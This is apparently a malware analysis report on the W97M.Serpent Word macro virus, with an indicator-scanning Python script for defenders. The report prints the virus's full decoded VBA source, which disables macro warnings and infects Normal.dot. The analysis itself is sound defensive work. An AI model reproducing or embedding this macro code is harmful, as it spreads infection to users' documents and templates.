Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e15cf93ca9dad04…

MALICIOUS

Office (OLE)

Size: 30.0 KB
Created: 2000-12-30 18:02:00
Authoring application: Microsoft Word 9.0 (Word 2000)
First seen: 2012-06-14
MD5: 28f43a607c9be3ffd2c0a4e9f9642f0e
SHA-1: 392b272c94a46a951a1bf053e3c76f18d445ac7e
SHA-256: 3e15cf93ca9dad04a86ddf11e31ee94ce4e493a774e931a8b8dd5dd10d7b89f6
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample carries VBA macros with a Document_Open entry point, so the code runs as soon as the document is opened (ATT&CK T1059.005). The macro is a self-replicating Word 97/2000 macro virus, not a downloader. It first sets Options.VirusProtection to 0 (through Const nula = 2 * 0, which avoids a literal False that signature scanners would key on) to silence Word's macro warning (ATT&CK T1562.001, Impair Defenses). It then reads its own source through VBProject.VBComponents(1).CodeModule and overwrites the first code module of both the global template (NormalTemplate, i.e. Normal.dot) and the active document with that source, shuttling the text through a clipboard DataObject. If the template's module already has the same line count, it shows a fake "Error245! MSWord will try to fix the problem." dialog before re-infecting anyway. On the 7th day of any month it runs a prank payload: a message box of random characters and a loop that moves the application window around. Finally it disables the "Visual Basic Editor" item on the Macro menu to hinder inspection and saves the document. The in-code comment 'W97M.sErPeNt bY e[ax]' and the ClamAV name Doc.Trojan.Serpent-1 agree on the family. No network activity, dropped file or second-stage payload is present in the source; the impact is infection of Normal.dot, from which the same routine spreads the code into other documents as they are opened.

Heuristics 3

  • ClamAV: Doc.Trojan.Serpent-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Serpent-1
  • VBA macros detected [medium] (OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro present: the code runs automatically when the document is opened

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2366 bytes
SHA-256: d7fea8f1fe039eb2c70a704a59473ad9740e901233b830c55754a0463458dd79
Detection
ClamAV: Doc.Trojan.Serpent-1
Obfuscation or payload: unlikely (no encoded strings, shellcode or dropped file; the only payload is the date-triggered message box and window movement visible in the source below)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Private Sub Document_Open(): Dim KIOXCFG, SDFHITD, GHJIDFR, LKJWERT: Set LKJWERT = ActiveDocument.VBProject.VBComponents(1).CodeModule: Const nula = 2 * 0
With Options: .VirusProtection = nula: End With
Set KIOXCFG = ThisDocument.VBProject.VBComponents(1).CodeModule
Set SDFHITD = NormalTemplate.VBProject.VBComponents(1).CodeModule
GHJIDFR = KIOXCFG.lines(1, KIOXCFG.countoflines)
If SDFHITD.countoflines = KIOXCFG.countoflines Then
MsgBox "Error245! MSWord will try to fix the problem.", vbCritical, "MSWord - error"
End If
Dim QOINMV As New DataObject: QOINMV.SetText GHJIDFR
With SDFHITD: .deletelines 1, SDFHITD.countoflines: .insertlines 1, QOINMV.GetText
End With: With LKJWERT: .deletelines 1, LKJWERT.countoflines: .insertlines 1, QOINMV.GetText
End With
If Day(Now()) = 7 Then
Dim asd As String
For l = 1 To 4
asd = Chr(Rnd * 34 + 123) & ChrW(Rnd * 100 + 23)
asd = asd & Chr(Rnd * 200 - 10): dsa = asd & Hex(234 * Rnd) & Chr(Rnd * 5 + 55)
dfg = dsa & Hex(54) & asd & dsa: h = Asc(Chr(Rnd * 123)): x = asd & dfg & dsa & h & x
Next l
MsgBox x & dsa & asd & dfg & dsa & dfg & dfg & dsa & "---> Kad sve izgleda da umire ono se ustvari radja! <---" & dsa & dfg & asd & dfg & dfg & h & asd & dfg & x, vbExclamation, asd & " BIHnet.ORG 4nD EB Vir Labs 43v3r!!! " & asd
Application.WindowState = wdWindowStateNormal
'===={ ideja za D-Cross payload: e[ax] }===
Application.Move 150, 150
Application.Caption = "...hmmm, strange!"
For c = 1 To 300
Application.Move c, c
Application.Move -c, -c
Next c
'===={ kraj kôda za D-Cross payload }======
End If
With CommandBars: .Item("Macro").Controls("Visual Basic Editor").Enabled = False: End With: ActiveDocument.Save
'W97M.sErPeNt bY e[ax]
'D-Cross payload bY e[ax]
'Greetz: k04x, rudeboy, t[r]ax, E-Man, BIGFOOOT, SnakeLord
'Vr4g, h4dija, slash ...te ostalim pri BIHnet.org
'10x to: [moebius], KnowDeth, Jackie 2Fl0wer, Psyclone X, Mist
'mort-, Nala, LifeWire, GygaByte, ^Coke, Fulvian, VirusBuster
'...and to VicodinES (Once again God Bless tha Poppy!)
End Sub
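To reproduce the report's heuristics and the self-replication indicators on the decoded source above, here is an added triage scanner. It is example code written for this page, not the analysis platform's or oletools' own code. It runs over an excerpt of the macros.bas listing that is constructed inline (payload loop and greeting comments omitted, one comment line added to exercise comment stripping) so the script is self-contained; every rule ID except OLE_VBA_DOCOPEN is a name chosen here, and the severity weights and verdict thresholds are illustrative.

```python
"""Indicator scan over decoded VBA source (added example, not platform code).
Rule IDs other than OLE_VBA_DOCOPEN are names chosen for this example."""
import re
from dataclasses import dataclass

# Constructed test input: an excerpt of the macros.bas artifact in this report,
# with the payload loop omitted and one comment line added (line 18).
SAMPLE_VBA = """Attribute VB_Name = "Modul1"
Private Sub Document_Open(): Dim KIOXCFG, SDFHITD, GHJIDFR, LKJWERT: Set LKJWERT = ActiveDocument.VBProject.VBComponents(1).CodeModule: Const nula = 2 * 0
With Options: .VirusProtection = nula: End With
Set KIOXCFG = ThisDocument.VBProject.VBComponents(1).CodeModule
Set SDFHITD = NormalTemplate.VBProject.VBComponents(1).CodeModule
GHJIDFR = KIOXCFG.lines(1, KIOXCFG.countoflines)
If SDFHITD.countoflines = KIOXCFG.countoflines Then
MsgBox "Error245! MSWord will try to fix the problem.", vbCritical, "MSWord - error"
End If
Dim QOINMV As New DataObject: QOINMV.SetText GHJIDFR
With SDFHITD: .deletelines 1, SDFHITD.countoflines: .insertlines 1, QOINMV.GetText
End With: With LKJWERT: .deletelines 1, LKJWERT.countoflines: .insertlines 1, QOINMV.GetText
End With
If Day(Now()) = 7 Then
End If
With CommandBars: .Item("Macro").Controls("Visual Basic Editor").Enabled = False: End With: ActiveDocument.Save
'W97M.sErPeNt bY e[ax]
'Sub Document_Open mentioned in a comment must not fire (constructed line)
End Sub
"""


@dataclass(frozen=True)
class Rule:
    rule_id: str
    severity: str
    pattern: str
    note: str


# VBA is case-insensitive, so every pattern is compiled with IGNORECASE.
# The VirusProtection rule keys on the property being assigned at all, not on
# a literal 0/False: this sample hides the value behind "Const nula = 2 * 0".
RULES = [
    Rule("OLE_VBA_DOCOPEN", "high",
         r"\bSub\s+(Document_Open|AutoOpen|AutoExec|AutoNew|Document_New)\b",
         "auto-executing macro entry point"),
    Rule("VBA_DISABLE_VIRUSPROTECTION", "high", r"\.VirusProtection\s*=",
         "Options.VirusProtection assigned (macro warning disabled)"),
    Rule("VBA_CODEMODULE_ACCESS", "critical",
         r"VBProject\.VBComponents\([^)]*\)\.CodeModule",
         "reads or writes VBA source through the VBE object model"),
    Rule("VBA_NORMAL_TEMPLATE_WRITE", "critical", r"\bNormalTemplate\.VBProject\b",
         "touches the global template's VBA project (Normal.dot infection)"),
    Rule("VBA_CODEMODULE_EDIT", "high",
         r"\.(InsertLines|DeleteLines|AddFromString|ReplaceLine)\b",
         "edits a code module in place"),
    Rule("VBA_CLIPBOARD_DATAOBJECT", "medium", r"\bNew\s+DataObject\b",
         "clipboard DataObject used to shuttle text"),
    Rule("VBA_DISABLE_VBE_MENU", "medium",
         r'Controls\("Visual Basic Editor"\)\.Enabled\s*=\s*False',
         "hides the Visual Basic Editor menu item"),
    Rule("VBA_DATE_TRIGGER", "low",
         r"\b(Day|Month|Weekday|Year)\s*\(\s*Now\s*\(\s*\)\s*\)\s*=",
         "date-conditioned code path (time bomb)"),
]

WEIGHTS = {"critical": 30, "high": 20, "medium": 10, "low": 5}  # illustrative


@dataclass(frozen=True)
class Finding:
    rule_id: str
    severity: str
    line_no: int
    evidence: str


def strip_comment(line: str) -> str:
    """Drop a trailing VBA comment: an apostrophe outside a string literal.
    VBA escapes a quote inside a string by doubling it, so toggling on every
    '"' still tracks the in-string state correctly."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def scan_vba(source: str) -> list[Finding]:
    """One finding per (rule, line). Comments are ignored; string literals are
    not, on purpose: attackers do stage code inside strings."""
    compiled = [(r, re.compile(r.pattern, re.IGNORECASE)) for r in RULES]
    findings = []
    for line_no, raw in enumerate(source.splitlines(), start=1):
        code = strip_comment(raw)
        for rule, rx in compiled:
            m = rx.search(code)
            if m:
                findings.append(Finding(rule.rule_id, rule.severity, line_no, m.group(0)))
    return findings


def verdict(findings: list[Finding]) -> tuple[str, int]:
    """Score each distinct rule once, so a long file cannot inflate the result."""
    per_rule = {f.rule_id: f.severity for f in findings}
    score = sum(WEIGHTS[sev] for sev in per_rule.values())
    label = "MALICIOUS" if score >= 50 else "SUSPICIOUS" if score >= 20 else "CLEAN"
    return label, score


if __name__ == "__main__":
    hits = scan_vba(SAMPLE_VBA)
    for f in hits:
        print(f"L{f.line_no:<3} {f.severity:<8} {f.rule_id:<28} {f.evidence}")
    print(verdict(hits))
```

Feed it the full decoded macros.bas (olevba -c output, for instance) instead of the excerpt and the same rules fire; the CodeModule and NormalTemplate rules are the ones that separate a self-replicating macro virus like this sample from a one-off dropper, which typically triggers only the auto-execute and shell rules.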